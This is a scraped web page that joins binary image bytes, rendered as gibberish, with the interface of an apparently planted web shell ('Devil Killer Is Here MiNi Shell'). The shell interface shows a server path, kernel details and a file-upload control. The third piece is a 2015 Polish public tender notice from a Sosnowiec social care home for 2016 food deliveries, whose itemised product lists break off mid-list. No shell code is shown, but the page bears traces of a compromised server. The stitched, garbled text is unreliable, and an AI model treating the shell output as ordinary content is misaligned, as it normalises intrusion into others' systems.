JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151130/324394-N-2015.html

<p class="kh_header"><b>Sosnowiec: dostawa żywności na 2016rok na potrzeby Domu Pomocy Społecznej nr1  przy ul.gen.Wł.Andersa 81b z podziałem na 8 pakietów.</b><br>
<b>Numer ogłoszenia: 324394 - 2015; data zamieszczenia: 30.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej Nr 1 , ul. gen. Wł. Andersa 81b, 41-200 Sosnowiec, woj. śląskie, tel. 32 2665042, faks 32 2665042.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> dps1sosnowiec.pl-zakładka BIP</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa żywności na 2016rok na potrzeby Domu Pomocy Społecznej nr1  przy ul.gen.Wł.Andersa 81b z podziałem na 8 pakietów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> dostawy żywności na 2016 rok  na potrzeby Domu Pomocy Społecznej nr1 w Sosnowcu z podziałem na 8 części, wyszczególnienie asortyment znajduje w załączniku nr 1 do SIWA.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.50.00.00-3, 15.80.00.00-6, 15.22.00.00-6, 15.33.11.70-9, 03.20.00.00-3, 03.14.25.00-3, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> dps1sosnowiec.pl-zakładka BIP<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej nr n1
41-200 Sosnowiec 
ul.gen.Wł.Andersa 81 b
Administracja.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2015 godzina 12:00, miejsce: Dom Pomocy Społecznej nr n1
41-200 Sosnowiec 
ul.gen.Wł.Andersa 81 b
dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	BALERON		kg	65
2.	BIAŁA KIEŁBASA PARZONA		kg	6
3.	BOCZEK ŚWIEŻY BEZ SKÓRY B/K		kg	7
4.	BOCZEK WĘDZONY BEZ KOŚCI		kg	33
5.	FILET PIECZONY Z INDYKA		kg	30
6.	KARCZEK  Z KOŚCIĄ		kg	227
7.	KARCZEK PIECZONY		kg	6
8.	KASZANKA		kg	115
9.	KIEŁ.PARÓWKOWA		kg	220
10.	KIEŁB.PODWAWELSKA		kg	300
11.	KIEŁB.ŚLĄSKA		kg	50
12.	KIEŁBASA  KMINKOWA		kg	74
13.	KIEŁBASA GŁOGOWSKA		kg	8
14.	KIEŁBASA KRAKOWSKA  PIECZONA		kg	100
15.	KIEŁBASA SZYNKOWA WIEPRZOWA		kg	78
16.	KORPUSY Z KURCZAKA		kg	225
17.	KOŚCI Z KARCZKU		kg	25
18.	KURCZAK ŚWIEŻY		kg	850
19.	ŁOPATKA  BEZ KOŚCI 		kg	450
20.	MIELONKA TYROLSKA PRASOWANA		kg	60
21.	MIĘSO WOŁOWE GULASZOWE		kg	150
22.	PARÓWKI CIELĘCE		kg	46
23.	PARÓWKI WIEPRZOWE WINERKI		kg	60
24.	PASZTET  PIECZONY		kg	63
25.	PASZTETOWA		kg	60
26.	PIECZEŃ WIEPRZOWA		kg	170
27.	PIECZEŃ WOŁOWA Z ŁOPATKI BEZ KOŚCI		kg	100
28.	PIERSI Z INDYKA		kg	40
29.	PIERSI Z KURCZAKA		kg	215
30.	POLEDWICA KRÓLEWSKA		kg	30
31.	POLĘDWICA SOPOCKA		kg	10
32.	ROLADA BOCZKOWA		kg	18
33.	ROLADA SCHABOWA 		kg	13
34.	ROSÓŁ WOŁOWY ROZBRATEL		kg	150
35.	SALCESON WIEJSKI		kg	110
36.	SCHAB Z KOŚCIĄ		kg	160
37.	SŁONINA ŚWIEŻA BEZ SKÓRY		kg	150
38.	SZYNKA DROBIOWA Z INDYKA 		kg	100
39.	SZYNKA KONSERWOWA		kg	75
40.	SZYNKA WIEJSKA		kg	180
41.	UDKA  Z KURCZAKA		kg	490
42.	WĄTRÓBKA Z KURCZAKA		kg	100
43.	ŻEBERKA WIEPRZOWE		kg	80
44.	ŻOŁĄDKI KURCZAKA		kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa mleka i produktów mleczarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	JOGURT DANON GRATKA 115 g lub równoważny		szt.	1 900
2.	JOGURT NATURALNY 330 G		szt.	40
3.	KEFIR LUKSUSOWY 2% 250g		szt.	360
4.	MARGARYNA 250g		szt.	2 400
5.	MASŁO EXTRA  MIX PASŁĘCKI 77% TŁUSZCZU 200 g		kg	755
6.	MLEKO 2% 0,9L W  WORECZKACH		szt.	9 810
7.	MLEKO 2% 1 L KARTONY		szt.	190
8.	MLEKO W PROSZKU 400g		szt.	25
9.	OLEJ RZEPAKOWY 1L		szt.	600
10.	SER ŻÓŁTY GOŁDA		kg	110
11.	SER ŻÓŁTY SALAMI		kg	100
12.	SER TARTY PARMEZAN		kg	5
13.	SEREK HOMOGENIZOWANY NATURALNY 140g		szt.	1 200
14.	SEREK HOMOGENIZOWANY SMAKOWY 125g		szt.	1 200
15.	SEREK WIEJSKI 150 g		szt.	20
16.	SEREK TOPIONY 17,5g		szt.	300
17.	SEREK TOPIONY 50g		szt.	3 400
18.	SER FAVITA 270 g 18% TŁUSZCZU		szt.	4
19.	ŚMIETANA 18% 180g		szt.	60
20.	ŚMIETANA  30% 0,5 l		szt.	720
21.	TWARÓG PÓŁTŁUSTY		kg	610.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.55.55.55-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	ANANAS KAWAŁKI - PUSZKA 580 ml		szt.	8
2.	BAZYLIA 10 g		szt.	8
3.	BISZKOPTY 120G		szt	50
4.	BITA ŚMIETANA W SPRAY		szt.	5
5.	BRZOSKWINIA PUSZKA 820 g		szt.	100
6.	BUDYŃ Z CUKREM 63 g		szt.	400
7.	BULION GRZYBOWY 60 g		szt.	5
8.	CZEKOLADA NA GORĄCO 500 g		OP	5
9.	CHRZAN 300 g		szt	80
10.	CIASTKA KRUCHE RÓŻNE 		kg	20
11.	CIASTKA MARKIZY CZEKOLADOWE LUB RÓWNOWAŻNE 220 g		op	15
12.	CUKIER 1 kg		kg	1 100
13.	CUKIER PUDER 400 g		szt.	190
14.	CUKIER WANILIOWY 32g		szt.	450
15.	CUKIERKI GALARETKA W CZEKOLADZIE		kg	5
16.	CUKIERKI MICHAŁKI LUB RÓWNOWAŻNE		kg	5
17.	CURRY MIELONE 20g		szt	20
18.	CYNAMON 20 g		szt.	50
19.	CZEKOLADA GORZKA 100 g		szt.	70
20.	CZEKOLADA mleczna 100 g		szt.	70
21.	CZOSNEK GRANULOWANY 20 g		szt.	25
22.	ĆWIKŁA Z CHRZANEM 300 g		szt.	12
23.	DELICJE 147 g lub równoważne 		szt.	120
24.	DROŻDŻE 		kg	20
25.	DŻEM RÓZNE SMAKI 330 G		szt	1 400
26.	FASOLA SZPARAGOWA SŁOIK 400 g		szt.	6
27.	FIGURKA ŚW.MIKOŁAJA 64 g		szt.	70
28.	GAŁKA MUSZKATOŁOWA MIELONA 15 g		szt.	25
29.	GALARETKA OWOCOWA  75 g		szt.	650
30.	GROSZEK KONSERWOWY 400 g		szt.	140
31.	GRZYBY SUSZONE /PODGRZYBEK/40G		szt.	20
32.	HERBATA LIŚCIASTA JUNAN 250 G		kg	75
33.	HERBATA LIPTON W SASZETKACH a 100 szt		OP	1
34.	HERBATA SAGA  a 200 SZT		OP	2
35.	HERBATA SAGA DZIKA RÓZA I MALINA  a 30 SZT		OP	2
36.	HERBATA GRZANIEC a 30 szt		op	4
37.	IMBIR MIELONY 20g		szt.	10
38.	KASZA JECZMIENNA PERŁOWA 1 kg		kg	140
39.	KASZA JAGLANA		kg	10
40.	KAKAO HOLENDERSKIE 200 g		szt.	24
41.	KAPUSTA CZERWONA KONSERWOWA 900 g		szt.	350
42.	KASZA GRYCZANA  1  kg		kg	80
43.	KASZA MANNA 1kg		kg	280
44.	KAWA ROZPUSZCZALNA PRWADZIWA 200 g		szt.	15
45.	KAWA ZBOŻOWA KUJAWIANKA 0,5 kg		szt.	360
46.	KETCHUP TORTEX ŁAGODNY 0,5 kg		szt.	80
47.	KISIEL Z CUKREM 77 g		szt.	400
48.	KMINEK MIELONY 20 g		szt	20
49.	KONCENTRAT BURACZANY KRAKUS LUB RÓWNOWAŻNY 300 ml		szt.	50
50.	KONCENTRAT PUDLISZKI POMIDOROWY 30% LUB RÓWNOWAŻNY 1000 g		szt.	70
51.	KONCENTRAT POMIDOROWY 30%  200 g		szt.	50
52.	KOPEREK SUSZONY 25 g		szt.	40
53.	KUCHAREK 1 kg		kg	90
54.	KRAKERSY 200 g		szt	15
55.	KUKURYDZA KONSERWOWA 400 g		szt.	80
56.	KWASEK CYTRYNOWY 20 g		szt.	70
57.	LIŚĆ LAUROWY 8 g		szt.	50
58.	MAJERANEK 10 g		szt.	80
59.	MAJONEZ KIELECKI 310 g		szt.	130
60.	MAK NIEBIEKI 0,5kg		szt.	20
61.	MAKARON  LUBELLA KOKARDKI ,KOLANKA OZDOBNE,WSTĄŻKI,ZACIERKA,MUSZELKI ,NITKI  LUB RÓWNOWAŻNY,ŚWIDERKI ŁAZANKIa 500 g		kg	700
62.	MĄKA PSZENNA 1 kg TYP 500		kg	1 000
63.	MĄKA ZIEMNIACZANA 1kg		kg	200
64.	MIESZANKA MEKSYKAŃSKA 400 g		szt.	20
65.	MIGDAŁY 100 g		szt.	10
66.	MIÓD WIELOKWIATOWY 25g		szt.	1 500
67.	MIÓD WIELOKWIATOWY 370G		szt.	30
68.	MUSZTARDA DELIKATESOWA 175 g		szt.	280
69.	OREGANO  20 g		szt	20
70.	OCET WINNY BIAŁY 500 ml		szt.	10
71.	ORZECH WŁOSKI ŁUSKANY 100g		szt	20
72.	OCET 500 ml		szt.	50
73.	OGÓRKI KONSERWOWE 900 g		szt.	180
74.	ORANŻADA 1,5		szt	12
75.	OLEJEK AROMAT 10G		szt.	100
76.	PAPRYKA KONSERWOWA 650 g		szt.	70
77.	PAPRYKA SŁODKA W PROSZKU 20 g		szt.	50
78.	PALUSZKI SŁONE  200 g		szt	25
79.	PASZTECIK DROBIOWY 90 g		szt.	2 800
80.	PIEPRZ  CZARNY MIELONY 20 g		szt	400
81.	PŁATKI OWSIANE 500  g		szt.	140
82.	PIECZARKI MARYNOWANE 280 g		szt	20
83.	PIETRUSZKA SUSZONA 10 g		szt	50
84.	POMIDORY W PUSZCE 400 g		szt	30
85.	PROSZEK DO PIECZENIA 36 g		szt.	150
86.	PRZECIER OGÓRKOWY 290 g		szt.	220
87.	PIERNIKI NADZIEWANE 200 g		szt.	70
88.	PRAŻONE JABŁKA Z MORELĄ DO SZARLOTKI 900g		szt	30
89.	PRZYPRAWA DO RYB 20 g		szt	20
90.	PRZYPRAWA DO ZIEMNIAKÓW 30g		szt	5
91.	PRZYPRAWA DO PIERNIKA 30 g		szt	40
92.	PRZYPRAWA DO ZUP WINIARY 1 l		szt.	190
93.	RODZYNKI  100 g		szt	50
94.	ROSOŁEK DROBIOWY WINIARY 60 g		OP	100
95.	RYŻ 1kg		kg	370
96.	SAŁATKA SZWEDZKA 900 g		szt.	80
97.	SELER KONSERWOWY W SŁOIKU 330 g		szt	10
98.	SODA 80 g		szt.	20
99.	SERNIK NA ZIMNO 500 g		szt	10
100.	SOS CZOSNKOWY 0,5 l		szt	10
101.	SOK POMARAŃCZOWY 100% 200 ml		szt.	140
102.	SOS TRUSKAWKOWY 500 g		szt.	2
103.	SOS CZEKOLADOWY 500 g		szt.	2
104.	SYROP OWOCOWY 500 ml		szt.	1 000
105.	SOS ZIOŁOWY  10 g		szt.	5
106.	SÓL 1 kg		kg	280
107.	SUCHARKI BEZ CUKRU 290 g		szt	20
108.	SUCHARKI   290 g		szt.	30
109.	SZCZAW KONSERWOWY 290 g		szt.	50
110.	ŚMIETANKA W PROSZKU CREMONA 200 g		szt.	5
111.	TYMIANEK 10 g		szt.	5
112.	VEGETA 200G		szt.	10
113.	WAFELKI W CZEKOLADZIE 40G		szt.	200
114.	WAFLE RÓZNE SMAKI 180G		szt.	150
115.	WIÓRKI KOKOSOWE  0,5 kg		szt	6
116.	WINO MUSUJĄCE 750 ml		szt.	12
117.	WODA MINERALNA  1,5 l		szt.	600
118.	WODA MINERALNA GAZOWANA 0,5l		szt.	40
119.	ZIELE ANGIELSKIE 15 g		szt.	45
120.	ZIOŁA PROWAN.9g		szt.	10
121.	ŻELATYNA  50 g		szt.	180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ryby mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	FILET MROŻONY Z TILAPI		kg	160
2.	KARP ŻYWY		kg	28
3.	MAKRELA WĘDZONA		kg	100
4.	MATJAS 		kg	128
5.	MINTAJ FILET MROŻONY		kg	70
6.	PSTRĄG ŚWIEŻY PATROSZONY		kg	5
7.	ŚLEDŹ KONSER.W OLEJU 170 g		szt 	130
8.	ŚLEDŹ KONSER.W POMIDORACH 170 g		szt	352
9.	TUŃCZYK KONSERW. KAWAŁKI 170 g		szt	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> warzywa mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	BARSZCZ UKRAIŃSKI 		kg	40
2.	BROKUŁY MROŻONE 		kg	130
3.	FASOLKA SZPARAGOWA 		kg	80
4.	FLAKI WOŁOWE SUCHE CIĘTE  900g		szt	145
5.	JAGODA MROŻONA 		kg	25
6.	KALAFIOR MROŻONY 		kg	80
7.	MARCHEWKA MROŻONA 		kg	340
8.	MARCHEWKA MROŻONA Z GROSZKIEM		kg	30
9.	MIESZANKA KOMPOTOWA 		kg	500
10.	MIESZANKA WARZYWNA 7 SKŁADNIKOWA 		kg	215
11.	SZPINAK MROŻONY BRYKIET 		kg	80
12.	TRUSKAWKA MROŻONA 		kg	180
13.	WŁOSZCZYZNA MROŻONA PASKI		kg	225
14.	WARZYWA NA PATELNIĘ 		kg	20
15.	WIŚNIA 		kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.17-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> warzywa i owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	ARBUZ		kg	40
2.	BANANY		kg	120
3.	BOTWINKA		szt.	40
4.	BROKUŁY ŚWIEŻE		szt.	90
5.	BURAKI		kg	700
6.	CEBULA		kg	650
7.	CEBULKA ZIELONA		pęczki	100
8.	CYTRYNA		kg	215
9.	CZOSNEK GŁÓWKA		szt.	190
10.	FASOLA JAŚ		kg	70
11.	FASOLKA SZPARAGOWA		kg	13
12.	GRUSZKA SUSZONA		kg	2
13.	GROCH ŁUSKANY		kg	70
14.	JABŁKA		kg	780
15.	JABŁKA SUSZONE		kg	2
16.	JAGODA ŚWIEŻA		kg	10
17.	KALAFIOR		szt.	60
18.	KAPUSTA BIAŁA		kg	900
19.	KAPUSTA BIAŁA  MŁODA		szt.	180
20.	KAPUSTA PEKIŃSKA		szt.	135
21.	KAPUSTA KISZONA		kg	780
22.	KIWI		kg	4
23.	KOPEREK ŚWIEZY		pęczki	320
24.	MALINY		kg	10
25.	MANDARYNKA		kg	100
26.	MARCHEW		kg	1200
27.	NEKTARYNKA		kg	10
28.	OGÓREK GRUNTOWY		kg	150
